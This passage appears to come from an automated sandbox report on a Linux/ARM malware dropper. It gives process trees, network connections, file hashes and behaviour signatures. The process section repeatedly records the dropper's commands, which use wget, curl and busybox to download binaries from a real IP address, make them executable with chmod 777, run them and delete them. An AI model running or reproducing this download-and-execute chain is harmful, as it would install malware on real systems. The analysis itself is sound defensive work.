| File opened for modification | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /usr/bin/curl | N/A |
Processes
/tmp/d6969275efae5bfe2230492af1741f5329a8a46491a6f58144e9ee58690c41af.sh
[/tmp/d6969275efae5bfe2230492af1741f5329a8a46491a6f58144e9ee58690c41af.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/chmod
[chmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
[./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/rm
[rm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/wget
[wget http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/chmod
[chmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h
[./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/rm
[rm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/wget
[wget http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/chmod
[chmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae
[./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/rm
[rm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/wget
[wget http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/chmod
[chmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd
[./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/rm
[rm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/wget
[wget http://87.120.126.196/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/chmod
[chmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20
[./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/rm
[rm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/wget
[wget http://87.120.126.196/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/chmod
[chmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i
[./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/rm
[rm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/wget
[wget http://87.120.126.196/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/chmod
[chmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u
[./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/rm
[rm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/wget
[wget http://87.120.126.196/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/chmod
[chmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv
[./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/rm
[rm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/wget
[wget http://87.120.126.196/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/chmod
[chmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd
[./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/rm
[rm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/wget
[wget http://87.120.126.196/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/chmod
[chmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo
[./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/rm
[rm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/wget
[wget http://87.120.126.196/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/chmod
[chmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj
[./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/rm
[rm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/wget
[wget http://87.120.126.196/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/chmod
[chmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC
[./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/rm
[rm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/wget
[wget http://87.120.126.196/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/chmod
[chmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH
[./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/rm
[rm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/wget
[wget http://87.120.126.196/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/chmod
[chmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6
[./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/rm
[rm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/usr/bin/wget
[wget http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/chmod
[chmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
[./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/rm
[rm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/wget
[wget http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/chmod
[chmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h
[./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/rm
[rm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/wget
[wget http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/chmod
[chmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae
[./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/rm
[rm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/wget
[wget http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/chmod
[chmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd
[./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/rm
[rm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/wget
[wget http://87.120.126.196/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/chmod
[chmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20
[./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/rm
[rm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/wget
[wget http://87.120.126.196/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/chmod
[chmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i
[./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/rm
[rm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/wget
[wget http://87.120.126.196/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/chmod
[chmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u
[./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/rm
[rm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/wget
[wget http://87.120.126.196/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/chmod
[chmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv
[./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/rm
[rm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/wget
[wget http://87.120.126.196/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/chmod
[chmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd
[./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/rm
[rm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/wget
[wget http://87.120.126.196/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/chmod
[chmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo
[./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/rm
[rm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/wget
[wget http://87.120.126.196/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/chmod
[chmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj
[./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/rm
[rm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/wget
[wget http://87.120.126.196/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/chmod
[chmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC
[./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/rm
[rm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/wget
[wget http://87.120.126.196/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/chmod
[chmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH
[./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/rm
[rm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/wget
[wget http://87.120.126.196/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/chmod
[chmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6
[./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/rm
[rm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| US | 151.101.193.91:443 | tcp | |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| GB | 89.187.167.3:443 | tcp | |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| GB | 185.125.188.61:443 | tcp | |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| GB | 185.125.188.62:443 | tcp | |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-28 03:24
Reported
2024-10-28 03:27
Platform
debian9-armhf-20240611-en
Max time kernel
4s
Max time network
5s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | N/A |
| N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /usr/bin/curl | N/A |
Processes
/tmp/d6969275efae5bfe2230492af1741f5329a8a46491a6f58144e9ee58690c41af.sh
[/tmp/d6969275efae5bfe2230492af1741f5329a8a46491a6f58144e9ee58690c41af.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/curl
